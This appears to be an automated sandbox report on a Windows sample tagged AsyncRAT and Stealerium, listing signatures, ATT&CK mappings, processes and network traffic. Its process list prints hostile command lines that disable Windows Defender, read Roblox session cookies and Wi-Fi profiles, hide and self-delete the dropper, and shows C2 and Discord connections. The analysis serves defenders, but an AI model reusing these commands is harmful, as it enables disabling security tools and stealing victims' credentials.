Malware Analysis Report

2024-08-06 12:53

Sample ID 240626-b76kesxdpe
Target Infected.exe
SHA256 a55c7ed8b626f509f1db86fb6be1823a6bdf54b47c73a348cfe70c36e8b45d82
Tags
asyncrat stealerium default collection execution persistence privilege_escalation rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a55c7ed8b626f509f1db86fb6be1823a6bdf54b47c73a348cfe70c36e8b45d82

Threat Level: Known bad

The file Infected.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat stealerium default collection execution persistence privilege_escalation rat spyware stealer

Stealerium

AsyncRat

Asyncrat family

Async RAT payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Accesses Microsoft Outlook profiles

Looks up geolocation information via web service

Looks up external IP address via web service

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Detects videocard installed

Runs ping.exe

outlook_win_path

Checks processor information in registry

Suspicious use of WriteProcessMemory

Views/modifies file attributes

outlook_office_path

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Event Triggered Execution
T1546
Netsh Helper DLL
T1546.007
Privilege Escalation
TA0004
Event Triggered Execution
T1546
Netsh Helper DLL
T1546.007
Defense Evasion
TA0005
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Remote System Discovery
T1018
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Email Collection
T1114
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-26 01:48

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 01:48

Reported

2024-06-26 02:05

Platform

win10v2004-20240611-en

Max time kernel

1050s

Max time network

1049s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Infected.exe"

Signatures

AsyncRat

rat asyncrat

Stealerium

stealer stealerium

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A icanhazip.com N/A N/A
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4728 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe C:\Windows\System32\cmd.exe
PID 4728 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe C:\Windows\System32\cmd.exe
PID 4164 wrote to memory of 4580 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4164 wrote to memory of 4580 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4580 wrote to memory of 232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\unytuk.exe
PID 4580 wrote to memory of 232 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\unytuk.exe
PID 232 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\SYSTEM32\attrib.exe
PID 232 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\SYSTEM32\attrib.exe
PID 232 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\Wbem\wmic.exe
PID 232 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\Wbem\wmic.exe
PID 232 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\Wbem\wmic.exe
PID 232 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\Wbem\wmic.exe
PID 232 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\Wbem\wmic.exe
PID 232 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\Wbem\wmic.exe
PID 232 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\Wbem\wmic.exe
PID 232 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\System32\Wbem\wmic.exe
PID 232 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\SYSTEM32\cmd.exe
PID 232 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\unytuk.exe C:\Windows\SYSTEM32\cmd.exe
PID 1636 wrote to memory of 3580 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 1636 wrote to memory of 3580 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 4728 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe C:\Windows\SYSTEM32\cmd.exe
PID 4728 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe C:\Windows\SYSTEM32\cmd.exe
PID 396 wrote to memory of 628 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 396 wrote to memory of 628 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 396 wrote to memory of 3048 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 396 wrote to memory of 3048 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 396 wrote to memory of 932 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 396 wrote to memory of 932 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 4728 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe C:\Windows\SYSTEM32\cmd.exe
PID 4728 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\Infected.exe C:\Windows\SYSTEM32\cmd.exe
PID 4796 wrote to memory of 1140 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 4796 wrote to memory of 1140 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 4796 wrote to memory of 4600 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 4796 wrote to memory of 4600 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Infected.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Infected.exe

"C:\Users\Admin\AppData\Local\Temp\Infected.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=2812,i,6522675234395427298,2952738987384583032,262144 --variations-seed-version --mojo-platform-channel-handle=3964 /prefetch:8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\unytuk.exe"' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\unytuk.exe"'

C:\Users\Admin\AppData\Local\Temp\unytuk.exe

"C:\Users\Admin\AppData\Local\Temp\unytuk.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\unytuk.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\unytuk.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\findstr.exe

findstr All

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3432,i,6522675234395427298,2952738987384583032,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 147.185.221.20:36797 tcp
US 8.8.8.8:53 20.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 147.185.221.20:36797 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 ptb.discord.com udp
US 162.159.136.232:443 ptb.discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 199.232.210.172:80 tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 147.185.221.20:36797 tcp
US 147.185.221.20:36797 tcp
US 147.185.221.20:36797 tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 147.185.221.20:36797 tcp
US 147.185.221.20:36797 tcp
US 147.185.221.20:36797 tcp
US 8.8.8.8:53 icanhazip.com udp
US 104.16.185.241:80 icanhazip.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 241.185.16.104.in-addr.arpa udp
US 8.8.8.8:53 api.mylnikov.org udp
US 104.21.44.66:443 api.mylnikov.org tcp
US 8.8.8.8:53 66.44.21.104.in-addr.arpa udp

Files

memory/4728-1-0x00000000008B0000-0x00000000008C6000-memory.dmp

memory/4728-0-0x00007FFD40393000-0x00007FFD40395000-memory.dmp

memory/4728-2-0x00007FFD40390000-0x00007FFD40E51000-memory.dmp

memory/4728-3-0x00007FFD40390000-0x00007FFD40E51000-memory.dmp

memory/4728-6-0x00007FFD40393000-0x00007FFD40395000-memory.dmp

memory/4728-7-0x00007FFD40390000-0x00007FFD40E51000-memory.dmp

memory/4728-8-0x00007FFD40390000-0x00007FFD40E51000-memory.dmp

memory/4728-9-0x000000001CBD0000-0x000000001CC46000-memory.dmp

memory/4728-10-0x00000000029B0000-0x00000000029E2000-memory.dmp

memory/4728-11-0x0000000002A90000-0x0000000002AAE000-memory.dmp

memory/4580-13-0x00007FFD40390000-0x00007FFD40E51000-memory.dmp

memory/4580-14-0x00000192809B0000-0x00000192809D2000-memory.dmp

memory/4580-15-0x00007FFD40390000-0x00007FFD40E51000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b2vfqzos.zgs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
